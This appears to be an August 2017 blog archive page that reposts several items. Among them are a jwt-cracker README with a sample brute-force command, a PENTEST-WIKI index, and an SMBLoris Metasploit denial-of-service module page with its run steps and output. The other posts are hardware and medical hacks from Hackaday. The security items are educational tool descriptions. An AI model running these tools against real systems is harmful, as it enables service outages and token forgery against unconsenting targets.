Mês: agosto 2017

jwt-cracker – Simple HS256 JWT Token Brute Force Cracker

Simple HS256 JWT token brute force cracker.
Effective only to crack JWT tokens with weak secrets.Recommendation: Use strong long secrets or RS256 tokens.Install
With npm:

npm install –global jwt-cracker

Usage
From command line:

jwt-cracker [] []

Where:

token: the full HS256 JWT token string to crack

alphabet: the alphabet to use for the brute force (default: “abcdefghijklmnopqrstuwxyzABCDEFGHIJKLMNOPQRSTUWXYZ0123456789”)

maxLength: the max length of the string generated during the brute force (default: 12)

Requirements
This script requires Node.js version 6.0.0 or higherExample
Cracking the default jwt.io example:

jwt-cracker “eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ” “abcdefghijklmnopqrstuwxyz” 6

It takes about 2 hours in a Macbook Pro (2.5GHz quad-core Intel Core i7).
Download jwt-cracker

http://ift.tt/2wxokhz http://ift.tt/2aM8QhC

Condom and Catheter Team up to Save New Mothers’ Lives

The title is sure to draw a snicker from some readers, but the purpose of this field-expedient treatment for postpartum hemorrhage is deadly serious, and a true medical hack that has the potential to save the lives of new mothers.

Postpartum hemorrhage is the leading cause of death during pregnancy, claiming about 86,000 women every year. While it can occur up to six weeks after giving birth, PPH is most serious immediately after delivery and can require aggressive treatment to prevent hypovolemic shock and eventual death. A fully equipped obstetrical suite will have access to an array of medications and devices to staunch the flow, including a uterine balloon tamponade (UBT) kit. But at $400 a kit, these devices are hard to come by in the developing world.

Not to be dissuaded, midwife [Anne Mulinge] from Nairobi, Kenya created a simple, cheap substitute using common items. A common urinary catheter is covered with an ordinary condom, the end of which is secured around the catheter with twine. Once inserted into the woman’s uterus, the condom is filled with saline solution through the catheter, expanding the condom and applying direct pressure to the bleeding uterine walls. The pressure allows the mother’s clotting mechanism to catch up with the decreased blood flow.

So far, [Anne] claims the device has saved three new mothers, and other midwives are being trained in the technique. Here’s hoping that more lives are saved with this simple hack, and perhaps with this more complex one designed to get blood to remote clinics as fast as possible.

Filed under: Medical hacks http://ift.tt/2vEhBFQ http://ift.tt/2aM8QhC

Researchers Put Windows Defender in a Sandbox to Show Microsoft How It’s Done

Software experts from Trail of Bits � a well-known security R&D company � have sandboxed Windows Defender, the default antivirus solution that ships with recent Windows editions. […] http://ift.tt/2vEhfiT http://ift.tt/2aM8QhC

PENTEST-WIKI: free online security knowledge library for pentesters/researchers – Penetration Testing

PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.

Contents

Contents

Network Analysis

IP

Whois

DNS

Identify Live Hosts

IDS/IPS Identification

Web Application

Web Application Fingerprint

CMS Identification

Open Source Analysis

IDS/IPS Identification

OSINT

GHDB

People

Pictures

Media

Company

Document

Vulnerability Scanners

Network Assessment

Web Application Assessment

Database Assessment

MongoDB

MySQL

Postgresql

Sqlite

Mobile Assessment

Android

&

Network Exploitation

Vulnerable Ports List

Cisco ASA CVE-2016-6366

OS Exploitation

Windows

Windows 2008 Active Directory Hacking

Windows 2012 Credentials dump

Metasploit – run vbs payload in cmd.exe

Windows Vssadmin

Web Exploitation

Database Exploitation

Wireless Exploitation

Social Engineering

Physical Exploitation

Open Source Exploitation

Password Attacks

Privilege Escalation Media

Windows Privilege Escalation Fundamentals

Basic Linux Privilege Escalation

Protocol Analysis

Spoofing Analysis

OS Backdoors

Tunneling

Web Backdoors

Public pentesting reports

Penetration Testing Books

Hackers Handbook Series

Defensive Development

Network Analysis Books

Reverse Engineering Books

Malware Analysis Books

Windows Books

Social Engineering Books

Lock Picking Books

OSINT Books

Flick

Nebula

NullByte-1

FTP

HTTP

Download

The post PENTEST-WIKI: free online security knowledge library for pentesters/researchers appeared first on Penetration Testing.

http://ift.tt/2vDGmlC http://ift.tt/2aM8QhC

A New Battery For A Potted Clock Module

If you did much dismantling of PCs back in the 1980s and 1990s, you might be familiar with the Dallas Semiconductor range of potted real-time clock modules. These were chunky dual-in-line devices containing clock and non-volatile RAM chips, a crystal, and a lithium battery. The battery was good for about a decade, which was fine for most PCs of the day because the majority of desktop computers are replaced long before that deadline.

[Glitch], however has an industrial single-board computer with a 486 processor that has had a life much more prolonged than its desktop siblings due to its application. The battery in the onboard Dallas DS1387 has long ago expired, and since these devices are so long out of production to be unavailable, he’s had to improvise.

Improving on some previous documented projects he found through an internet search, he carefully ground away the potting compound to reveal a couple of the battery conductors, cut them with a PCB drill, and mounted a lithium cell holder on the top of the device with some tidily soldered Kynar wires to bring in the power. A CR1225 cell was used rather than the ubiquitous CR2032, as space was at a premium in the width of the ISA card form factor.

The potted RTC module is something of a rare device these days, but if you have a retro computer containing one this seems to be a very useful piece of work to bring it back to life. We’ve covered another similar one with a slightly larger battery in the past.

Filed under: classic hacks http://ift.tt/2hz9HaN http://ift.tt/2aM8QhC

Fidget Spinner Shreds with Bass Guitar Pickup

Hackaday continues to embrace our implacable spinning overlords-of-the-heart.

[zazzazzero] posted a YouTube video showing him fidgeting one of those spinners that had been hooked up to a bass guitar pickup. It makes a rather awesome rumbling sound as the pickup registers the bearings rolling around, and when hooked up to a Digidelay effects pedal he moved it beyond the rumble to more of an industrial growl like a factory hum. He also got interesting sounds by tapping on the spinner with a screwdriver.

Then he switched up to using an iPad audio app called Shaper to modify the resulting sound far beyond what he had before, with more effects options available at the touch of a button. All of these sounds can be modulated into the analog synthesizer chain, making this spinner a for-reals musical instrument.

We’ve published more than a couple pieces on music hacking, including this ASDR envelope generator project and the Atom Smasher guitar pedal.

[thanks, km4yri]

Filed under: musical hacks, toy hacks http://ift.tt/2vtI9Jx http://ift.tt/2aM8QhC

SMBLoris Denial of Service Metasploit Module – Penetration Testing

What is SMBLoris?

SMBLoris is a remote and uncredentialed denial of service attack against Microsoft® Windows® operating systems, caused by a 20+ year old vulnerability in the Server Message Block (SMB) network protocol implementation.

What versions of Windows are affected?

The vulnerability is in all modern versions of Windows, at least from Windows 2000 through Windows 10. Systems are still vulnerable even if all versions of SMB (1, 2, and 3) are disabled.

What is the threat?

It is computationally inexpensive for an attacker to cause large memory allocations and enormous amounts of wasted CPU cycles†, rendering vulnerable machines completely unusable, making business-critical services (such as web and mail servers) unavailable, and even causing the entire operating system to crash.

Scenario

Sockets

Attack Cost‡

Memory Impact

Baseline

1

4 bytes

128 KiB

Single IPv4

65,535

256 KiB

8 GiB

Single IPv6

65,535

256 KiB

8 GiB

Dual IPv4 / IPv6

131,070

512 KiB

16 GiB

10 IPs

655,535

2.5 MiB

80 GiB

† CPU impact cannot be meaningfully measured, but is generally quite significant.

‡ Attack cost is measured by how many bytes of TCP data an attacker must send over the network.
It does not include standard network headers, which are also small overhead for the attacker.

Is there a CVE?

SMBLoris has not (yet?) been assigned a CVE. Some similar vulnerabilities include:

CVE-2012-5568

MS09-048 (CVE-2009-1925 and CVE-2009-1926)

CVE-2008-4609

CVE-2007-6750

Is there a patch?

Not at this time.

What ports are affected?

Generally, SMB runs on port 445. The NetBIOS service on port 139 is probably also exploitable.

auxiliary/dos/smb/smb_lorris Metasploit Module

This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See the SMBLoris page for details on the vulnerability.

The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.

Verification Steps

Example steps in this format (is also in the PR):

Start msfconsole

Do: use auxiliary/dos/smb/smb_lorris

Do: set RHOST [IP]

Do: run

Target should allocate increasing amounts of memory.

msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >

msf auxiliary(smb_loris) > run

[*] 192.168.172.138:445 – Sending packet from Source Port: 1025
[*] 192.168.172.138:445 – Sending packet from Source Port: 1026
[*] 192.168.172.138:445 – Sending packet from Source Port: 1027
[*] 192.168.172.138:445 – Sending packet from Source Port: 1028
[*] 192.168.172.138:445 – Sending packet from Source Port: 1029
[*] 192.168.172.138:445 – Sending packet from Source Port: 1030
[*] 192.168.172.138:445 – Sending packet from Source Port: 1031
[*] 192.168.172.138:445 – Sending packet from Source Port: 1032
[*] 192.168.172.138:445 – Sending packet from Source Port: 1033
….

Source: Github

The post SMBLoris Denial of Service Metasploit Module appeared first on Penetration Testing.

http://ift.tt/2vtYlui http://ift.tt/2aM8QhC

Ink-Filled Machine Badges Score Respect for Your Gear

Remember the good old days when machines had a stout metal badge instead of cheap vinyl decals, and nameplates on motors were engraved in metal rather than printed on a label with a QR code? Neither do we, but these raised brass labels with color filled backgrounds look great, they’re surprisingly easy to make, and just the thing your gear needs to demand respect as a cherished piece of gear.

The ‘easy’ part of this only comes if you have access to a machine shop like [John] at NYC CNC does. To be fair, the only key machine for making these plates is a laser cutter, and even a guy like [John] needed to farm that out. The process is very straightforward — a brass plate is cleaned and coated with lacquer, which is then removed by the laser in the areas that are to be etched. The plate is dipped in an electrolyte solution for etching, cleaned, and powder coated. After curing the powder coat with a heat gun rather than an oven — a tip worth the price of admission by itself — the paint is sanded off the raised areas, the metal is polished, and a clear coat applied to protect the badge.

Plates like these would look great for a little retro-flair on a new build like this Nixie power meter, or allow you to restore a vintage machine like this classic forge blower.

Filed under: laser hacks, misc hacks http://ift.tt/2fiOUHF http://ift.tt/2aM8QhC